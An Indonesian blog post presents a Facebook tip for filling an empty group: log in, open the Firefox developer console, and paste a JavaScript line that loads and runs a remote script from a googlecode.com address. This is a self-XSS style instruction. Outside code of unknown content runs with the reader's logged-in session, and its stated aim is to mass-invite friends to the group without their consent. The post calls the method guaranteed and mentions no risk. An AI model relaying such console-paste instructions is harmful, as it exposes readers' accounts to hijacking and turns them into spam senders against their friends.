Auto Invite Facebook

Met siang sobat blogger smile  ,, di siang ini sy mau berbagi tips facebook,,

sebelumya sy sdh posting gmn cara membuat posting ke facebook biar lbih keren

facebook-an mesti ada komunitas baik dibuat dri halaman atau grup,, nah permasalahannya gimana nie udh bikin gup masih kosong member/anggota ? jdinya grup sepi, mau itu mau ini  sulit, toh anggotanya dikit/ kosong,, mau nambahin temen satu-satu lama,, sulitkn ? brhbung itu Anasunni mau berbagi tips supaya grup di facebook rame or ga sepi,,, dengan bantuan script auto invite group facebook ,,,

Caranya gini sob;; Simak ya neutral

Script auto invite grup facebook,,, yah bgi para facebookers yg pengen punya grup dengan anggota beribu ribu ,,

pake cara ini nih dijamin langsung banyak tu anggotanya  rolleyes

oke to the point :

  • buka mozilla firefox
  • lalu log in ke fb sobat
  • masuk ke grup yg udh sobat buat (grup tujuan invite)
  • lalu tekan CTRL + SHIFT + K  pada keyboard sobat
  • lalu copy & paste kode dibawah ini :

document.body.appendChild(document.createElement(‘script’)).src=’http://vikrymadz.googlecode.com/files/AutoInviteGroup.js‘;

  • lalu tekan enter,,, tunggu hingga prosesnya selesai…

Gimana bisa ga?  wink

klo ga bsa komentar yua,,

baca juga Tips trik facebook lainnya

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s